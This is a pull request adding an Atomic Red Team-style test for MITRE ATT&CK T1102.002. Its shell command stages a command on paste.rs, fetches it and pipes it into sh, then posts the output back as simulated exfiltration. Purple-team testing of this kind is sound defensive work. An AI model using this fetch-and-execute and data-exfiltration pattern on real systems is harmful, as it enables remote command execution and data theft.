### PR TITLE
Added T1102.002

### DIFF
--- a/atomics/T1102.002/T1102.002.yaml
+++ b/atomics/T1102.002/T1102.002.yaml
@@ -1,0 +1,29 @@
+attack_technique: T1102.002
+display_name: 'Web Service: Bidirectional Communication'
+atomic_tests:
+  - name: Bidirectional C2 Simulation via paste.rs (sh)
+    description: |
+      This test replicates a full bidirectional C2 flow using the public paste.rs service...
+    supported_platforms:
+      - linux
+    input_arguments:
+      safe_command:
+        description: Command to stage and execute (safe text only)
+        type: string
+        default: echo Simulated host discovery output
+      paste_service:
+        description: Base URL of the pastebin-like service
+        type: string
+        default: https://paste.rs
+    executor:
+      name: sh
+      elevation_required: false
+      command: |
+        STAGE_URL=$(curl -s -X POST -d "#{safe_command}" "#{paste_service}")
+        echo "Command staged at: $STAGE_URL"
+        OUTPUT=$(curl -s "$STAGE_URL" | sh 2>&1)
+        echo "Fetched and executed command. Output: $OUTPUT"
+        EXFIL_URL=$(echo "$OUTPUT" | curl -s -X POST --data-binary @- "#{paste_service}")
+        echo "Results exfiltrated to: $EXFIL_URL"
+        echo "--- Attacker sees ---"
+        curl -s "$EXFIL_URL"


### PR DESCRIPTION
Hi everyone! 

# T1102.002
This PR adds a new Atomic Red Team test for MITRE ATT&CK T1102.002, Bidirectional Communication. This behavior demonstrates how a legitimate web service can be used as a communication channel for both tasking and result retrieval, aligning with the T1102.002 technique definition.

The implementation follows the existing project structure and conventions. I've also included a screenshot showing a successful execution of the test to help with review and verification.

# Testing:
I tested the new atomic locally and confirmed that the test executes successfully without errors. Also, the expected activity is generated.

<img width="775" height="255" alt="image" src="https://github.com/user-attachments/assets/f3f2f4e1-0e21-458c-91ed-bbef7fdeb989" />

Thank you for taking the time to review this contribution! Feedback and suggestions are always appreciated. 🙂